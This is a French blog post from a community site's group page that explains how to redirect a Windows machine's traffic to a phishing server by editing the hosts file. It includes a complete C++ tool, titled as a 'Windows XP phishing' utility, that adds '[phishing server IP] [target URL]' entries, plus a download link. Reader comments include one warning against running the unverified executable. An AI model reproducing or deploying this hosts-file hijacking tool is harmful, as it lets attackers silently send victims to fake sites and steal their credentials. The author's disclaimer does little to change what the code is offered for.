rencontre
patdetain
euh je sais plus quoi dire c tjrs trop court

Vos Articles    TOP50 Membres    TOP Albums    Rechercher    Groupes
INSCRIPTION    |    SE CONNECTER
LOGIN   -   MOT DE PASSE | perdu



Objet du groupe
L'antre du genie malin, des shouaits non formulés.
Fiche du groupe
Créateur du groupe : nementon lui envoyer un message  ajouter à mes préférés  alerter un modérateur
Nombre d'inscrits : 3
Date de création : 04/11/2009
Membres du groupe
Cette liste n'est pas publique

Les derniers billets postés


Billets par catégorie

 Informatique 

Phishing en local sous windows
Catégorie : Informatique | TAG : Phishing , Cpp , C++
2 commentaires      

Pour accomplir cela, il nous suffira de modifier le fichier hosts de windows, qui gèrent le "mapping" des ips en fonction des hosts choisit, l'on pourrait dire, des redirections d'ips "transparentes" dans notre cas

Je cite :

# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.

Fichier qui se trouve dans le dossier /Windows/system32/drivers/etc/

Observons le, et comprenons comment Windows se charge "de faire pointer", d'associer l'host localhost sur l'ip 127.0.0.1

On peut y voir gravé :

127.0.0.1 localhost

Héhé, simple n'est ce pas ? D'ou pour ceux de mauvaises foie :

[Ip serveur phishing] [Url serveur visé]



Aie, aie, aie, ça pique, en bonus, je vous offre un petit code en C++ (En mode procédural) pour pouvoir trifouiller tranquillement son fichier hosts sous xp (Ne fonctionne pas sous vista qui recuire des droits admins)


Code C++ :
  1.  
  2. #include "stdafx.h"
  3. #include <iostream>
  4. #include <cstdlib>
  5. #include <string>
  6. #include <fstream>
  7. #include <iostream>
  8.  
  9. using namespace std;
  10.  
  11. int _tmain(int argc, _TCHAR* argv[])
  12. {
  13. cout << "--- [Windows XP phishing pour http://www.genoxyde-security.com by Nementon] --- " << endl;
  14. cout << "Entrez l'adresse ip du server de phishing, puis l'url du site vise. "<< endl;
  15. cout << "Un reboot sera necessaire." << endl;
  16. cout << "Attention, ne l'utilisez pas a mauvais escient ! " << endl;
  17. string OS = getenv("OS"); // On verifie que l'on est sous windows
  18. if (OS == "Windows_NT") {
  19. string SystemDrive = getenv("SYSTEMDRIVE");
  20. SystemDrive += "/Windows/System32/drivers/etc/hosts";
  21. ifstream fichier(SystemDrive.c_str(), ios::in); // on ouvre le fichier en lecture
  22.  
  23. if(fichier) // si l'ouverture a réussi
  24. {
  25. // instructions
  26. cout << "Redirections serveurs trouvees : " << endl;
  27. string ligne;
  28. while(getline(fichier, ligne))
  29. {
  30. if (ligne.find("#") != 0) {
  31. cout << ligne << endl;
  32. }
  33. }
  34. fichier.close(); // on ferme le fichier
  35. }
  36. else
  37. {
  38. cerr << "Impossible d'ouvrir le fichier !" << endl;
  39. system("pause");
  40. return 0;
  41. }
  42. }
  43. else {
  44. cout << "Operation impossible, vous ne disposez pas d'un windows_NT" << endl;
  45. }
  46. int choix = 0;
  47. while (1 == 1) {
  48. cout << " Options: - Ajouter une adresse serveur : 1 - Supprimer l'adresse d'un serveur : 2 - Quitter : 3 " << endl;
  49. cin >> choix;
  50.  
  51. switch(choix) {
  52. case 1: {
  53. int Again = 1;
  54. do {
  55. cout << " Entrez l'adresse ip du serveur de phishing : " << endl;
  56. string ip;
  57. cin >> ip;
  58. cout << "Entrez l'url du site vise : " << endl;
  59. string url;
  60. cin >> url;
  61. // traitement
  62. string SystemDrive = getenv("SYSTEMDRIVE");
  63. SystemDrive += "/Windows/System32/drivers/etc/hosts";
  64. ofstream fichier(SystemDrive.c_str(), ios::out | ios::app ); // on ouvre le fichier en ecriture/ajout
  65.  
  66. if(fichier) // si l'ouverture a réussi
  67. {
  68. // instructions
  69. fichier <<" " << ip << " " << url << endl;
  70. fichier.close(); // on ferme le fichier
  71. }
  72. else
  73. {
  74. cerr << "Impossible d'ouvrir le fichier ! Navre, si vous etes sous vista, les droits admin sont necessaire ... " << endl;
  75. system("pause");
  76. return 0;
  77. }
  78. //Again ?
  79. cout << "Voulez vous ajouter d'autre adresses ? 1-0ui 2-Non" << endl;
  80. cin >> Again;
  81. if (cin.fail()==true)
  82. {
  83. // erreur
  84. Again = 2;
  85. }
  86. }while (Again == 1);
  87. }
  88. break;
  89. case 2: {
  90. int Again = 1;
  91. do {
  92. cout << "Entrez l'adresse du serveur a suprimer" << endl;
  93. string ip;
  94. cin >> ip;
  95. cout << "Working ... " << endl;
  96. int i = 0;
  97. string NewFichier;
  98.  
  99. string SystemDrive = getenv("SYSTEMDRIVE");
  100. SystemDrive += "/Windows/System32/drivers/etc/hosts";
  101. fstream fichier(SystemDrive.c_str(), ios::in | ios::out ); // on ouvre le fichier en ecriture/ajout
  102. if(fichier) // si l'ouverture a réussi
  103. {
  104. // instructions
  105. string ligne;
  106. while(getline(fichier, ligne))
  107. {
  108. if (ligne.find(ip) == 0) {
  109. NewFichier += "# "+ligne +" ";
  110. i++;
  111. }
  112. else {
  113. NewFichier += ligne+" ";
  114. }
  115. }
  116. fichier.close(); // on ferme le fichier
  117. ofstream fichier(SystemDrive.c_str(), ios::out | ios::trunc);
  118. if(fichier)
  119. {
  120. fichier << NewFichier;
  121. fichier.close();
  122. }
  123. cout << i << " adresses ip trouvees et enlevees " << endl;
  124. }
  125. else
  126. {
  127. cerr << "Impossible d'ouvrir le fichier ! Navre, si vous etes sous vista, les droits admin sont necessaire ... " << endl;
  128. system("pause");
  129. return 0;
  130. }
  131. //Again ?
  132. cout << "Voulez vous suprrimez d'autre adresses ? 1-0ui 2-Non" << endl;
  133. cin >> Again;
  134. if (cin.fail()==true)
  135. {
  136. // erreur
  137. Again = 2;
  138. }
  139. }while (Again == 1);
  140. }
  141. break;
  142. case 3:
  143. return 0;
  144. break;
  145. }
  146. }
  147. return 0;
  148. }
  149.  
  150.  
Ou à télécharger : Ici


Ils ont voté pour cet article : nementon
 

Commentaires

Pour ajouter un commentaire vous devez être logué


Bonjours maxime, Le code source est ici présent à titre de démonstration sur l'écriture, lecture de fichiers en Cpp. L'exécutable est entièrement futile, comme je le dis "pour pouvoir trifouiller tranquillement son fichier hosts sous xp", il n'est la que pour les flemmard (comme moi) qui voudrais tester cela sans à avoir à aller trifouiller son fichier hosts manuellement. Et je dirai, qu'un bon anti-virus feront les preuves de ma bonne foi =p

nementon le samedi 7 novembre 2009 à 22:50

Je ne conseillerai à personne d'exécuter le programme proposé au téléchargement ci-dessus. Quelques lignes de code affichées dans un blog ne garantissent en rien que l'exécutable fait bien ce qui est décrit dans le billet. Et franchement, j'ai du mal à comprendre pourquoi il faudrait un programme spécial pour éditer le fichier hosts alors qu'un simple éditeur de texte genre Notepad suffit. Méfiance.

Ancien membre le vendredi 6 novembre 2009 à 14:47



Site de rencontres gratuites ©2000-2012 Quoimagueule™, Tous droits réservés.

code de reduction - annuaire gratuit - Rencontre - Chat